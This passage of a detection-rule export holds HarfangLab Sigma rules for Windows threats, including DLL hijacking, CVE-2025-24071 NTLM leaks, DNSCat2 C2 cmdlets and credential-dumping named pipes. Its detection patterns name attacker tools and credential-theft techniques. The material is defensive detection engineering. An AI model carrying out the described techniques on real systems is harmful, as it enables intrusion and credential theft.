"rule_description": "Detects raw access to a physical disk device from a PowerShell or WinRM host process (powershell.exe, wsmprovhost.exe, winrshost.exe) running in a network logon session, i.e. driven remotely.\nAccessing raw devices on a remote computer using PowerShell is suspicious as it allows direct interaction with disk data, bypassing the operating system’s security controls and file permissions.\nThis kind of access can expose sensitive system files like NTDS.dit or SAM, which contain user credentials and authentication data.\nIf abused, it can lead to privilege escalation, credential theft, or complete system compromise.\nIt is recommended to check the PowerShell script linked to the process, to pivot on the source IP for suspicious activities, and to review the account used for the network logon.\n",
"rule_creation_date": "2025-07-23",
"rule_modified_date": "2025-10-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.002",
"attack.t1003.003",
"attack.t1006"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "abbb7ec2-813f-443e-a4d3-e37e6ed19e80",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081452Z",
"creation_date": "2026-03-23T11:45:34.081454Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081459Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tar.yml",
"content": "title: DLL Hijacking via tar.exe\nid: abbb7ec2-813f-443e-a4d3-e37e6ed19e80\ndescription: |\n Detects potential Windows DLL Hijacking via tar.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tar.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\archiveint.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "abbb7ec2-813f-443e-a4d3-e37e6ed19e80",
"rule_name": "DLL Hijacking via tar.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tar.exe.\nDLL hijacking takes advantage of the default Windows DLL search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder; loads from System32, SysWOW64 or WinSxS, and libraries signed by Microsoft Windows, are excluded by the rule.\nIt is recommended to investigate the loaded library (signature, origin, creation time) for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "abc0e1a7-b33c-40ca-9b53-f5ffa6da9f45",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604538Z",
"creation_date": "2026-03-23T11:45:34.604541Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604548Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://cti.monster/blog/2025/03/18/CVE-2025-24071.html",
"https://github.com/0x6rss/CVE-2025-24071_PoC",
"https://attack.mitre.org/techniques/T1187/"
],
"name": "cve-2025-24071.yml",
"content": "title: Explorer CVE-2025-24071 NTLM Hash Leak Vulnerability Exploited\nid: abc0e1a7-b33c-40ca-9b53-f5ffa6da9f45\ndescription: |\n Detects the possible exploitation of CVE-2025-24071 related to Windows Explorer.\n Windows Explorer processes certain file types automatically upon extraction even if the file is never explicitly opened or clicked on by the user.\n Upon extraction of a '.library-ms' file, Windows Explorer attempts to resolve the SMB path automatically.\n This action triggers an implicit NTLM authentication handshake which can be abused for credential access or NTLM relay.\n It is recommended to investigate the created file for suspicious content and to search for suspicious authentications by the user following this alert.\nreferences:\n - https://cti.monster/blog/2025/03/18/CVE-2025-24071.html\n - https://github.com/0x6rss/CVE-2025-24071_PoC\n - https://attack.mitre.org/techniques/T1187/\ndate: 2025/03/20\nmodified: 2025/08/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1187\n - attack.t1204.002\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.Explorer\n - classification.Windows.Exploit.CVE-2025-24071\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith: '.library-ms'\n MinimalStackTrace|contains: 'zipfldr.dll'\n Image: '?:\\Windows\\Explorer.exe'\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "abc0e1a7-b33c-40ca-9b53-f5ffa6da9f45",
"rule_name": "Explorer CVE-2025-24071 NTLM Hash Leak Vulnerability Exploited",
"rule_description": "Detects the possible exploitation of CVE-2025-24071 related to Windows Explorer.\nWindows Explorer processes certain file types automatically upon extraction even if the file is never explicitly opened or clicked on by the user.\nUpon extraction of a '.library-ms' file referencing an SMB path, Windows Explorer attempts to resolve that path automatically.\nThis action triggers an implicit NTLM authentication handshake which can be abused for credential access (capture of the NTLM response) or NTLM relay.\nThe rule only covers extraction performed by Explorer's built-in ZIP handler (zipfldr.dll); archives extracted with third-party tools are not matched.\nIt is recommended to investigate the created file for suspicious content (in particular the network path it references), to search for suspicious outbound SMB connections and authentications by the user following this alert, and to verify that the corresponding security update is installed.\n",
"rule_creation_date": "2025-03-20",
"rule_modified_date": "2025-08-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1187",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "abd22bb7-da7f-471d-ae9e-e11e212e7008",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593934Z",
"creation_date": "2026-03-23T11:45:34.593938Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594002Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_qprocess.yml",
"content": "title: DLL Hijacking via qprocess.exe\nid: abd22bb7-da7f-471d-ae9e-e11e212e7008\ndescription: |\n Detects potential Windows DLL Hijacking via qprocess.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'qprocess.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\utildll.dll'\n - '\\winsta.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "abd22bb7-da7f-471d-ae9e-e11e212e7008",
"rule_name": "DLL Hijacking via qprocess.exe",
"rule_description": "Detects potential Windows DLL Hijacking via qprocess.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ac265b31-0ca8-4933-8aea-121377e29f69",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090235Z",
"creation_date": "2026-03-23T11:45:34.090237Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090241Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882",
"https://attack.mitre.org/techniques/T1071/001/"
],
"name": "t1071_001_eqnedt32_network_connection.yml",
"content": "title: Office Equation Editor (EQNEDT32) Network Connection\nid: ac265b31-0ca8-4933-8aea-121377e29f69\ndescription: |\n Detects when EQNEDT32.EXE performs a network connection.\n This is a possible exploitation of CVE-2017-11882 related to EQNEDT32.EXE which will trigger the download of a payload from an external server.\n It is recommended to investigate the file opened by Office at the time of detection, and any suspicious actions taken by the detected process to determine if this action was legitimate.\nreferences:\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2021/01/12\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - classification.Windows.Source.NetworkActivity\n - classification.Windows.Exploit.CVE-2017-11882\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: network_connection\ndetection:\n selection:\n Image|endswith: '\\EQNEDT32.EXE'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ac265b31-0ca8-4933-8aea-121377e29f69",
"rule_name": "Office Equation Editor (EQNEDT32) Network Connection",
"rule_description": "Detects when EQNEDT32.EXE performs a network connection.\nThis is a possible exploitation of CVE-2017-11882 related to EQNEDT32.EXE which will trigger the download of a payload from an external server.\nIt is recommended to investigate the file opened by Office at the time of detection, and any suspicious actions taken by the detected process to determine if this action was legitimate.\n",
"rule_creation_date": "2021-01-12",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1071.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ac406f1f-081b-4df3-b466-c4448d600409",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627179Z",
"creation_date": "2026-03-23T11:45:34.627181Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627185Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/deepinstinct/Dirty-Vanity",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_possible_process_reflection.yml",
"content": "title: Possible Process Reflection via Windows Fork API\nid: ac406f1f-081b-4df3-b466-c4448d600409\ndescription: |\n Detects the reflection of a Windows process using the Windows fork API.\n Attackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\n This technique can be used to hide malicious tasks inside legitimate processes as well as silently dump process memory for credential access and privilege escalation.\n It is recommended to check for malicious actions by the process that created the remote thread and the injected one.\nreferences:\n - https://github.com/deepinstinct/Dirty-Vanity\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/01/04\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1055\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Thread\n - classification.Windows.Behavior.ProcessInjection\nlogsource:\n product: windows\n category: remote_thread\ndetection:\n selection:\n StartFunction|contains: 'RtlCreateProcessReflection'\n\n # This is handled by the rule 00ff5814-36a0-4bb9-8426-599b30b414a1\n exclusion_lsass:\n TargetImage|endswith: '\\lsass.exe'\n\n exclusion_werfault:\n ProcessImage:\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\syswow64\\WerFault.exe'\n ProcessParentCommandLine: '?:\\Windows\\System32\\svchost.exe -k WerSvcGroup'\n\n exclusion_rdrleakdiag:\n # C:\\WINDOWS\\system32\\RdrLeakDiag.exe -p 10768 -h 25 -tp 2 -cleanup -watson -unnamed -wait 240\n ProcessImage:\n - '?:\\Windows\\System32\\rdrleakdiag.exe'\n - '?:\\Windows\\syswow64\\rdrleakdiag.exe'\n ProcessCommandLine|contains|all:\n - 'RdrLeakDiag.exe'\n - '-cleanup'\n - '-watson'\n - '-unnamed'\n\n exclusion_thor_apt_scanner:\n ProcessOriginalFileName: 'thor64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Nextron Systems GmbH'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ac406f1f-081b-4df3-b466-c4448d600409",
"rule_name": "Possible Process Reflection via Windows Fork API",
"rule_description": "Detects the reflection of a Windows process using the Windows fork API.\nAttackers can use process forking to inject processes with shellcodes while evading detection since the modified process is the cloned one.\nThis technique can be used to hide malicious tasks inside legitimate processes as well as silently dump process memory for credential access and privilege escalation.\nIt is recommended to check for malicious actions by the process that created the remote thread and the injected one.\n",
"rule_creation_date": "2023-01-04",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ac4f7776-e1b3-49ea-b9de-b82d05ad3952",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090981Z",
"creation_date": "2026-03-23T11:45:34.090983Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090987Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_checknetisolation.yml",
"content": "title: DLL Hijacking via checknetisolation.exe\nid: ac4f7776-e1b3-49ea-b9de-b82d05ad3952\ndescription: |\n Detects potential Windows DLL Hijacking via checknetisolation.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate signed Windows executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'checknetisolation.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DNSAPI.dll'\n - '\\FirewallAPI.dll'\n - '\\fwbase.dll'\n - '\\fwpuclnt.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ac4f7776-e1b3-49ea-b9de-b82d05ad3952",
"rule_name": "DLL Hijacking via checknetisolation.exe",
"rule_description": "Detects potential Windows DLL Hijacking via checknetisolation.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate signed Windows executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "aca3c3d1-7e17-432a-a8f8-38f1719a61a4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624571Z",
"creation_date": "2026-03-23T11:45:34.624573Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624577Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/iagox86/dnscat2",
"https://github.com/lukebaggett/dnscat2-powershell",
"https://attack.mitre.org/techniques/T1071/004/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1071_004_dnscat2_powershell_c2.yml",
"content": "title: DNSCat2 PowerShell Cmdlet Executed\nid: aca3c3d1-7e17-432a-a8f8-38f1719a61a4\ndescription: |\n Detects the usage of DNSCat2 PowerShell client for command and control communication over DNS protocol.\n DNSCat2 is a C2 tool that tunnels data over DNS queries and responses, often used by attackers to bypass network security controls.\n The PowerShell implementation contains distinctive strings, function names, and behavior patterns related to DNS query crafting and data exfiltration.\n It is recommended to investigate the process tree, analyze network DNS traffic for unusual patterns, and check for related malicious activity on the compromised system.\nreferences:\n - https://github.com/iagox86/dnscat2\n - https://github.com/lukebaggett/dnscat2-powershell\n - https://attack.mitre.org/techniques/T1071/004/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2025/11/07\nmodified: 2025/12/08\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.DNSCat2\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n ScriptBlockText|contains:\n - 'Get-Dnscat2StreamKeys'\n - 'Get-Dnscat2PacketSignature'\n - 'Get-Dnscat2PeerAuthStrings'\n - 'Get-Dnscat2ShortAuthString'\n - 'Get-NextDnscat2Data'\n - 'New-Dnscat2SYN'\n - 'New-Dnscat2MSG'\n - 'New-Dnscat2FIN'\n - 'New-Dnscat2ENC'\n - 'New-Dnscat2Tunnel'\n\n condition: selection\nlevel: high\nconfidence: strong\n\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "aca3c3d1-7e17-432a-a8f8-38f1719a61a4",
"rule_name": "DNSCat2 PowerShell Cmdlet Executed",
"rule_description": "Detects the usage of DNSCat2 PowerShell client for command and control communication over DNS protocol.\nDNSCat2 is a C2 tool that tunnels data over DNS queries and responses, often used by attackers to bypass network security controls.\nThe PowerShell implementation contains distinctive strings, function names, and behavior patterns related to DNS query crafting and data exfiltration.\nIt is recommended to investigate the process tree, analyze network DNS traffic for unusual patterns, and check for related malicious activity on the compromised system.\n",
"rule_creation_date": "2025-11-07",
"rule_modified_date": "2025-12-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1071.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ace4c145-1aaf-42ed-bf5c-227ceb652b03",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078225Z",
"creation_date": "2026-03-23T11:45:34.078227Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078232Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment?next_slideshow=82266109",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_credential_dumping_named_pipes_connection.yml",
"content": "title: Named Pipe Connected Associated with Credential Dumping Tools\nid: ace4c145-1aaf-42ed-bf5c-227ceb652b03\ndescription: |\n Detects a suspicious attempt to dump credentials in Windows using tools that connect to specific named pipes.\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze both the transmitting and receiving processes and to look for other suspicious activities on the host.\nreferences:\n - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment?next_slideshow=82266109\n - https://attack.mitre.org/techniques/T1003/\ndate: 2022/07/11\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - classification.Windows.Source.NamedPipe\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName|contains:\n - '\\lsadump'\n - '\\cachedump'\n - '\\wceservicepipe'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ace4c145-1aaf-42ed-bf5c-227ceb652b03",
"rule_name": "Named Pipe Connected Associated with Credential Dumping Tools",
